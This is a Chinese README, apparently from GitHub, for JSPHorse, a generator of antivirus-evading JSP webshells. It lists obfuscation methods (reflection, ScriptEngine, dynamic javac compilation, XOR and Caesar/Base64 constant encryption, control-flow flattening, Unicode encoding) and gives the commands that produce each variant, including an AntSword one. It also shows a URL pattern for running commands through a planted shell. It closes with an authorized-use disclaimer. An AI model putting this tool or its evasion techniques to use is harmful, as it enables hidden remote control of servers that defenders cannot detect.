一个JSP免杀Webshell生成器,主要支持普通回显Webshell,也实现了蚁剑的免杀
へ /|
/\7 ∠_/
/ │ / /
│ Z _,< / /`ヽ
│ ヽ / 〉
Y ` / /
?● ? ● ??〈 /
() へ | \〈
>? ?_ ィ │ //
/ へ / ?<| \\
ヽ_? (_/ │//
7 |/
>―r ̄ ̄~∠--|
主要的免杀技术:
- 基本的Java反射调用免杀
- ScriptEngine调用JS免杀
- Javac动态编译class免杀
- java.beans.Expression免杀
代码生成方式:
- 双重随机异或运算加密数字常量
- 凯撒密码随机偏移并结合Base64双重加密字符串常量
- 使用控制流平坦化并随机生成分发器
- 所有标识符全部替换为随机字符串
- 支持全局Unicode编码
- 每次执行都会生成完全不同的马(结构相同内容不同)
简单测试了免杀效果:
名称 | 测试结果 |
---|---|
百度WEBDIR+ | |
河马SHELLPUB | |
Windows Defender |
在Github右侧Release页面下载
生成标准形式基础Webshell
java -jar JSPHorse.jar -p your_password
生成蚁剑的免杀Webshell
java -jar JSPHorse.jar -p your_password --ant
生成Javac动态编译class的Webshell
java -jar JSPHorse.jar -p your_password --javac
使用ScriptEngine调用JS免杀
java -jar JSPHorse.jar -p your_password --js
使用Expression免杀
java -jar JSPHorse.jar -p your_password --expr
任何一种方式加入-u
参数进行Unicode编码(有时候有奇效)
java -jar JSPHorse.jar -p your_password --expr -u
如何使用?
1.jsp?pwd=your_password&cmd=ipconfig
使用截图
在线查杀
参考天下大木头师傅的Webshell:https://github.com/KpLi0rn/Shell
参考三梦师傅的Webshell:https://github.com/threedr3am/JSP-Webshells
未经授权许可使用JSPHorse
攻击目标是非法的
本程序应仅用于授权的安全测试与研究目的